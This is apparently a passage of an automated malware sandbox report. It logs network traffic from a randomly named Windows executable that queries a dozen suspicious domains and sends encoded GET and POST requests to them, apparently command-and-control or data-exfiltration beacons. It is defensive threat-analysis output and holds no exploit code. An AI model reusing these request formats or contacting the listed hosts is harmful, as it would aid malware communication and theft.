                                                                                                                  Oct 8, 2024 15:40:40.828504086 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.828557968 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.828569889 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.828583002 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.828582048 CEST5001780192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:40.828772068 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.828783035 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.828795910 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.828819036 CEST5001780192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:40.828975916 CEST5001780192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:40.829006910 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.829956055 CEST5001780192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:40.835489988 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.835581064 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.835591078 CEST8050017162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:40.837461948 CEST5001780192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:41.566968918 CEST5001780192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:42.585304976 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:42.590648890 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:42.591530085 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:42.603425980 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:42.608382940 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:42.608546019 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543582916 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543610096 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543629885 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543677092 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:43.543706894 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543725967 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543745041 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543752909 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:43.543761015 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543781042 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.543790102 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:43.543867111 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:43.544075012 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.544112921 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.544163942 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:43.548846006 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.548901081 CEST8050018162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:43.548953056 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:44.114074945 CEST5001880192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:45.133615971 CEST5001980192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:45.138650894 CEST8050019162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:45.141554117 CEST5001980192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:45.147373915 CEST5001980192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:45.153122902 CEST8050019162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:45.911300898 CEST8050019162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:45.957319975 CEST5001980192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:50.918159008 CEST8050019162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:50.919640064 CEST5001980192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:50.923422098 CEST5001980192.168.2.5162.241.244.106
                                                                                                                  Oct 8, 2024 15:40:50.930989027 CEST8050019162.241.244.106192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:56.038431883 CEST5002080192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:56.043637991 CEST8050020199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:56.043787956 CEST5002080192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:56.054073095 CEST5002080192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:56.058985949 CEST8050020199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:56.509367943 CEST8050020199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:56.509607077 CEST8050020199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:56.509628057 CEST8050020199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:56.509716988 CEST5002080192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:57.586112022 CEST5002080192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:58.601424932 CEST5002180192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:58.607616901 CEST8050021199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:58.608334064 CEST5002180192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:58.623476028 CEST5002180192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:40:58.629165888 CEST8050021199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:59.093717098 CEST8050021199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:59.093744993 CEST8050021199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:59.093848944 CEST8050021199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:59.095041037 CEST5002180192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:00.135842085 CEST5002180192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:01.147722006 CEST5002280192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:01.154628038 CEST8050022199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:01.155100107 CEST5002280192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:01.165079117 CEST5002280192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:01.170068026 CEST8050022199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:01.170224905 CEST8050022199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:01.635869026 CEST8050022199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:01.635988951 CEST8050022199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:01.636054993 CEST5002280192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:01.636360884 CEST8050022199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:01.636426926 CEST5002280192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:02.682243109 CEST5002280192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:03.695534945 CEST5002380192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:03.700926065 CEST8050023199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:03.701023102 CEST5002380192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:03.711556911 CEST5002380192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:03.716943026 CEST8050023199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:04.179184914 CEST8050023199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:04.179466963 CEST8050023199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:04.179502964 CEST8050023199.59.243.227192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:04.179629087 CEST5002380192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:04.179663897 CEST5002380192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:04.182430983 CEST5002380192.168.2.5199.59.243.227
                                                                                                                  Oct 8, 2024 15:41:04.188345909 CEST8050023199.59.243.227192.168.2.5

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 8, 2024 15:37:50.202202082 CEST6344253192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:37:50.329077959 CEST53634421.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:06.601857901 CEST5740653192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:38:07.068972111 CEST53574061.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:20.648308039 CEST5242053192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:38:20.773758888 CEST53524201.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:34.163955927 CEST5313953192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:38:34.174218893 CEST53531391.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:42.242611885 CEST6025253192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:38:42.259428024 CEST53602521.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:38:55.459422112 CEST5326753192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:38:55.958530903 CEST53532671.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:09.882620096 CEST6259953192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:39:10.057825089 CEST53625991.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:23.601300001 CEST5748653192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:39:23.614012003 CEST53574861.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:39.821336985 CEST5076853192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:39:40.249830961 CEST53507681.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:53.822051048 CEST5056453192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:39:54.816852093 CEST5056453192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:39:55.156999111 CEST53505641.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:39:55.157015085 CEST53505641.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:08.633158922 CEST5117653192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:40:08.782763004 CEST53511761.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:23.306152105 CEST5442953192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:40:24.262759924 CEST53544291.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:37.462526083 CEST5373853192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:40:37.490845919 CEST53537381.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:40:55.932038069 CEST5693653192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:40:56.035773993 CEST53569361.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:09.195586920 CEST5915653192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:41:09.203517914 CEST53591561.1.1.1192.168.2.5
                                                                                                                  Oct 8, 2024 15:41:15.787945032 CEST5107253192.168.2.51.1.1.1
                                                                                                                  Oct 8, 2024 15:41:15.803016901 CEST53510721.1.1.1192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Oct 8, 2024 15:37:50.202202082 CEST192.168.2.51.1.1.10xf4adStandard query (0)www.newdaydawning.netA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:06.601857901 CEST192.168.2.51.1.1.10xa077Standard query (0)www.40wxd.topA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:20.648308039 CEST192.168.2.51.1.1.10xd08aStandard query (0)www.uburn.xyzA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:34.163955927 CEST192.168.2.51.1.1.10x3459Standard query (0)www.i16zb920d.cfdA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:42.242611885 CEST192.168.2.51.1.1.10xff58Standard query (0)www.o731lh.vipA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:55.459422112 CEST192.168.2.51.1.1.10xfe3eStandard query (0)www.nakama2-sshl.xyzA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:09.882620096 CEST192.168.2.51.1.1.10xe196Standard query (0)www.zz82x.topA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:23.601300001 CEST192.168.2.51.1.1.10xb891Standard query (0)www.tukaari.shopA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:39.821336985 CEST192.168.2.51.1.1.10x7c53Standard query (0)www.prj81oqde1.buzzA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:53.822051048 CEST192.168.2.51.1.1.10x7452Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:54.816852093 CEST192.168.2.51.1.1.10x7452Standard query (0)www.komart.shopA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:08.633158922 CEST192.168.2.51.1.1.10xf50eStandard query (0)www.healthyloveforall.netA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:23.306152105 CEST192.168.2.51.1.1.10x8173Standard query (0)www.lurknlarkk.xyzA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:37.462526083 CEST192.168.2.51.1.1.10x1601Standard query (0)www.mommymode.siteA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:55.932038069 CEST192.168.2.51.1.1.10xd836Standard query (0)www.polarmuseum.infoA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:41:09.195586920 CEST192.168.2.51.1.1.10x45e8Standard query (0)wwwA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:41:15.787945032 CEST192.168.2.51.1.1.10xd079Standard query (0)wwwA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Oct 8, 2024 15:37:50.329077959 CEST1.1.1.1192.168.2.50xf4adNo error (0)www.newdaydawning.netnewdaydawning.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:37:50.329077959 CEST1.1.1.1192.168.2.50xf4adNo error (0)newdaydawning.net44.213.25.70A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:07.068972111 CEST1.1.1.1192.168.2.50xa077No error (0)www.40wxd.top40wxd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:07.068972111 CEST1.1.1.1192.168.2.50xa077No error (0)40wxd.top206.119.82.134A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:20.773758888 CEST1.1.1.1192.168.2.50xd08aNo error (0)www.uburn.xyz67.223.117.189A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:34.174218893 CEST1.1.1.1192.168.2.50x3459Name error (3)www.i16zb920d.cfdnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:42.259428024 CEST1.1.1.1192.168.2.50xff58No error (0)www.o731lh.vipo731lh.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:42.259428024 CEST1.1.1.1192.168.2.50xff58No error (0)o731lh.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:42.259428024 CEST1.1.1.1192.168.2.50xff58No error (0)o731lh.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:38:55.958530903 CEST1.1.1.1192.168.2.50xfe3eNo error (0)www.nakama2-sshl.xyz183.181.83.131A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:10.057825089 CEST1.1.1.1192.168.2.50xe196No error (0)www.zz82x.topzz82x.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:10.057825089 CEST1.1.1.1192.168.2.50xe196No error (0)zz82x.top38.47.232.196A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:23.614012003 CEST1.1.1.1192.168.2.50xb891No error (0)www.tukaari.shoptukaari.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:23.614012003 CEST1.1.1.1192.168.2.50xb891No error (0)tukaari.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:23.614012003 CEST1.1.1.1192.168.2.50xb891No error (0)tukaari.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:40.249830961 CEST1.1.1.1192.168.2.50x7c53No error (0)www.prj81oqde1.buzz154.212.219.2A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:55.156999111 CEST1.1.1.1192.168.2.50x7452No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:55.156999111 CEST1.1.1.1192.168.2.50x7452No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:55.157015085 CEST1.1.1.1192.168.2.50x7452No error (0)www.komart.shopkomart.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:39:55.157015085 CEST1.1.1.1192.168.2.50x7452No error (0)komart.shop133.130.35.90A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:08.782763004 CEST1.1.1.1192.168.2.50xf50eNo error (0)www.healthyloveforall.nethealthyloveforall.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:08.782763004 CEST1.1.1.1192.168.2.50xf50eNo error (0)healthyloveforall.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:08.782763004 CEST1.1.1.1192.168.2.50xf50eNo error (0)healthyloveforall.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:24.262759924 CEST1.1.1.1192.168.2.50x8173No error (0)www.lurknlarkk.xyzredirect.3dns.boxCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:24.262759924 CEST1.1.1.1192.168.2.50x8173No error (0)redirect.3dns.box172.191.244.62A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:37.490845919 CEST1.1.1.1192.168.2.50x1601No error (0)www.mommymode.sitemommymode.siteCNAME (Canonical name)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:37.490845919 CEST1.1.1.1192.168.2.50x1601No error (0)mommymode.site162.241.244.106A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:40:56.035773993 CEST1.1.1.1192.168.2.50xd836No error (0)www.polarmuseum.info199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:41:09.203517914 CEST1.1.1.1192.168.2.50x45e8Name error (3)wwwnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 8, 2024 15:41:15.803016901 CEST1.1.1.1192.168.2.50xd079Name error (3)wwwnonenoneA (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • www.newdaydawning.net
                                                                                                                  • www.40wxd.top
                                                                                                                  • www.uburn.xyz
                                                                                                                  • www.o731lh.vip
                                                                                                                  • www.nakama2-sshl.xyz
                                                                                                                  • www.zz82x.top
                                                                                                                  • www.tukaari.shop
                                                                                                                  • www.prj81oqde1.buzz
                                                                                                                  • www.komart.shop
                                                                                                                  • www.healthyloveforall.net
                                                                                                                  • www.lurknlarkk.xyz
                                                                                                                  • www.mommymode.site
                                                                                                                  • www.polarmuseum.info

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.54986344.213.25.70804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:37:50.352426052 CEST475OUTGET /7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA== HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Host: www.newdaydawning.net
                                                                                                                  Connection: close
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Oct 8, 2024 15:37:51.485133886 CEST489INHTTP/1.1 301 Moved Permanently
                                                                                                                  Date: Tue, 08 Oct 2024 13:37:50 GMT
                                                                                                                  Server: Apache
                                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                  X-Redirect-By: WordPress
                                                                                                                  Location: http://newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA==
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Oct 8, 2024 15:37:51.503470898 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549956206.119.82.134804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:07.089812040 CEST712OUTPOST /l8if/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.40wxd.top
                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 203
                                                                                                                  Referer: http://www.40wxd.top/l8if/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 39 59 71 37 77 6b 54 62 62 75 39 74 30 49 46 56 4c 43 36 7a 76 31 69 49 6c 6a 56 59 4e 4b 50 2b 54 46 56 39 67 34 3d
                                                                                                                  Data Ascii: nV=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm39Yq7wkTbbu9t0IFVLC6zv1iIljVYNKP+TFV9g4=


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.549973206.119.82.134804568C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 8, 2024 15:38:09.632733107 CEST732OUTPOST /l8if/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Host: www.40wxd.top
                                                                                                                  Origin: http://www.40wxd.top
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: max-age=0
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 223
                                                                                                                  Referer: http://www.40wxd.top/l8if/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                  Data Raw: 6e 56 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6e 41 70 43 70 42 4e 35 43 4c 69 74 33 46 46 41 71 59 4b 74 36 54 79 4e 47 32 30 67 54 69 6d 30 69 6e 43 63 44 37 56 6d 33 6c 49 4c 62 2f 4d 36 6d 6d 2b 31 64 71 42 56 52 50 52 74 70 42 32 45 6d 35 7a 47 62 58 73 37 6d 6d 52 51 75 68 54 4d 4b 31 4f 77 71 44 6a 6f 54 61 48 30 4e 51 6c 5a 62 77 33 41 62 69 58 48 56 34 2f 47 51 6f 6d 68 76 63 4e 4f 33 74 58 74 76 73 49 49 52 4d 4e 52 69 65 6e 69 69 4e 61 65 79 62 4b 55 31 36 39 67 67 64 4d 69 78 50 4d 6a 36 51 31 74 45 49 32 50 6c 69 6c 76 50 70 4b 53 67 50 5a 61 59 32 72 69 4a 39 72 6d 6b 77 56 6c 6a 33 76 52 39 54 42 31 4e 4b 4a 49 51 6e 5a 37 31 77 56 33 56 6e 77 37
                                                                                                                  Data Ascii: nV=SZf4ZXZLRuD8nApCpBN5CLit3FFAqYKt6TyNG20gTim0inCcD7Vm3lILb/M6mm+1dqBVRPRtpB2Em5zGbXs7mmRQuhTMK1OwqDjoTaH0NQlZbw3AbiXHV4/GQomhvcNO3tXtvsIIRMNRieniiNaeybKU169ggdMixPMj6Q1tEI2PlilvPpKSgPZaY2riJ9rmkwVlj3vR9TB1NKJIQnZ71wV3Vnw7
                                                                                                                  Oct 8, 2024 15:38:10.550307989 CEST289INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Tue, 08 Oct 2024 13:38:10 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 146
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
